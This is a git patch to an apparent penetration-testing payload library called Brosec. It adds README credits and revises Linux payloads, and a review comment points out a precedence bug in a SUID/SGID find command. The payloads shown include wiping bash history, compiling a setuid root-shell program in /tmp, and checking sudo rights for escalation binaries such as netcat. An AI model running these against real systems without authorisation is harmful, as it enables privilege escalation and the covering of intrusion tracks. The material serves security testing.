From e9dda63ed58c2201b12f0dff4e0ec14b080315fd Mon Sep 17 00:00:00 2001
From: gabemarshall
Date: Wed, 29 Jun 2016 09:50:41 -0400
Subject: [PATCH] Minor improvements to a few payloads, added a Credits section to the README

---
 README.md | 12 ++++++++++++
 payloads/linux.js | 16 +++-------------
 2 files changed, 15 insertions(+), 13 deletions(-)

diff --git a/README.md b/README.md
index d7e9fb0..ea58de7 100644
--- a/README.md
+++ b/README.md
@@ -104,3 +104,15 @@ Swag

Submit a pull request, create an issue, or just send feedback to and I'll happily send you a sticker (supplies limited, free shipping to continental US only). Otherwise you can order one from [StickerMule](https://www.stickermule.com/marketplace/10877-brosec-security-for-bros) + + +Credits +====== + +Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In addition, many payloads were referenced from other resources and deserve a shoutout. + +- [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) +- [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +- [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html) + +Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor) diff --git a/payloads/linux.js b/payloads/linux.js index 3ae9c60..b3fb45b 100644 --- a/payloads/linux.js +++ b/payloads/linux.js @@ -83,8 +83,8 @@ Load({ // Linux File Commands pg 6 Load({ payload: "diff file1 file2", desc: "Compare two files", category: "File System"}) Load({ payload: "strings -n 5", desc: "Set minimum string length", category: "File System"}) -Load({ payload: "find / -perm +6000 -type f -exec ls -ld {} \\;", desc: "Find all SUID binaries", category: "File System"}) -Load({ payload: "find . -type f -mmin -5 -not -path \"*/proc/*\" 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"}) +Load({ payload: "find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null", desc: "Find all SUID and SGID files", category: "File System"}) +Load({ payload: "find . -type f -mmin -5 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"}) Load({ desc: "Find files and grep results", 
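Review bot: The new SUID/SGID `find` in the first `+Load(...)` line of the `payloads/linux.js` hunk does not do what its `desc` claims, because `-o` binds looser than the implied `-a`: the expression parses as `-perm -g=s -o ( -perm -4000 ! -type l -maxdepth 3 -exec ... )`, so a file that is only SGID satisfies the left branch, the `-exec ls -ld` on the right branch is never evaluated, and since an explicit action is present there is no default `-print` — SGID-only files are silently dropped and the command effectively lists SUID files only. Group the permission tests so the action applies to both: `Load({ payload: "find / \\( -perm -4000 -o -perm -2000 \\) ! -type l -exec ls -ld {} \\; 2>/dev/null", desc: "Find all SUID and SGID files", category: "File System"})`. `-perm -2000` also avoids the GNU-only `-g=s` spelling, and moving or dropping `-maxdepth` removes the "global option after argument" warning that `2>/dev/null` is currently hiding; if the depth limit is intentional for speed, put `-maxdepth 3` before the tests and say so in `desc`, since depth 3 misses common setuid helpers under `/usr/lib/*/` and `/usr/local/bin/`. This hunk's trailing context appears truncated in this view (the `Find files and grep results` entry is cut after its `desc` line).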
@@ -218,20 +218,10 @@ Load({ payload: "rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null", des // ############### Privesc ###################### -// Load({ -// desc: "Find files and grep results", -// payload: "find . -type f -exec grep -IHin '' 2>/dev/null {} +", -// callback: function(bro){ -// question("What search term would you like to use?"); -// ask.some(questions, bro); -// }, -// category: "File System" -// }) - // Credit to @LuxCupitor Load({ title: "Write r00t.c to the /tmp directory and compile", payload: "echo -e '#include \\nint main(int argc, char **argv)\\n{\\nsetuid(0);\\nsetgid(0);\\nexecl(\"/bin/sh\", \"sh\", NULL);\\nreturn 1;\\n}\\n' > /tmp/r00t.c;gcc /tmp/r00t.c -o /tmp/r00t", category: "Privesc"}) Load({ title: "Check for privesc via sudo privileges", payload: "sudo -S -l 2>/dev/null | grep -w 'nmap\\|perl\\|awk\\|find\\|bash\\|sh\\|man\\|more\\|less\\|vi\\|vim\\|nc\\|netcat\\|python\\|ruby\\|lua\\|irb\\|chown\\|chmod\\|zip\\|tar\\|tcpdump\\|gdb'", category: "Privesc"}) -// +// /* ###################################################### ############### End of Payloads ######################